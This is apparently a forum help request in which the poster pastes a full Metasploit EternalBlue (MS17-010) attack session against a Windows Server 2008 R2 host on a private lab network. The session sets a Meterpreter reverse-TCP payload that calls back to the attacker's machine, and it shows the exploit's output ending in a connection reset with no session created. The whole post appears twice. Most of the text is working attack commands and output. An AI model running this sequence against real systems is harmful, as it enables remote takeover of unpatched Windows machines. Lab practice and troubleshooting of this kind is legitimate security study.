A
Ali_Sedaghat
I have this problem with windows/smb/ms17_010_eternalblue
Attaker OS: Kali Linux 2019.2 x32 ---> 192.168.15.101
metasploit v5.0.41-dev
Victim OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (x64) ---> 192.168.15.102
Port 445 is Open & Vulner
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.15.102
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.15.101
set lport 4444
exploit
[] Started reverse TCP handler on "192.168.15.101:4444"
[] "192.168.15.102:445" - Connecting to target for exploitation.
[+] "192.168.15.102:445" - Connection established for exploitation.
[] "192.168.15.102:445" - Trying exploit with 12 Groom Allocations.
[] "192.168.15.102:445" - Sending all but last fragment of exploit packet
[] "192.168.15.102:445" - Starting non-paged pool grooming
[+] "192.168.15.102:445" - Sending SMBv2 buffers
[+] "192.168.15.102:445" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] "192.168.15.102:445" - Sending final SMBv2 buffers.
[] "192.168.15.102:445" - Sending last fragment of exploit packet!
[] "192.168.15.102:445" - Receiving response from exploit packet
[] "192.168.15.102:445" - Sending egg to corrupted connection.
[-] "192.168.15.102:445" - Errno::ECONNRESET: Connection reset by peer
[] Exploit completed, but no session was created.
Please help me.
Thanks.
Attaker OS: Kali Linux 2019.2 x32 ---> 192.168.15.101
metasploit v5.0.41-dev
Victim OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (x64) ---> 192.168.15.102
Port 445 is Open & Vulner
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.15.102
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.15.101
set lport 4444
exploit
[] Started reverse TCP handler on "192.168.15.101:4444"
[] "192.168.15.102:445" - Connecting to target for exploitation.
[+] "192.168.15.102:445" - Connection established for exploitation.
[] "192.168.15.102:445" - Trying exploit with 12 Groom Allocations.
[] "192.168.15.102:445" - Sending all but last fragment of exploit packet
[] "192.168.15.102:445" - Starting non-paged pool grooming
[+] "192.168.15.102:445" - Sending SMBv2 buffers
[+] "192.168.15.102:445" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] "192.168.15.102:445" - Sending final SMBv2 buffers.
[] "192.168.15.102:445" - Sending last fragment of exploit packet!
[] "192.168.15.102:445" - Receiving response from exploit packet
[] "192.168.15.102:445" - Sending egg to corrupted connection.
[-] "192.168.15.102:445" - Errno::ECONNRESET: Connection reset by peer
[] Exploit completed, but no session was created.
Please help me.
Thanks.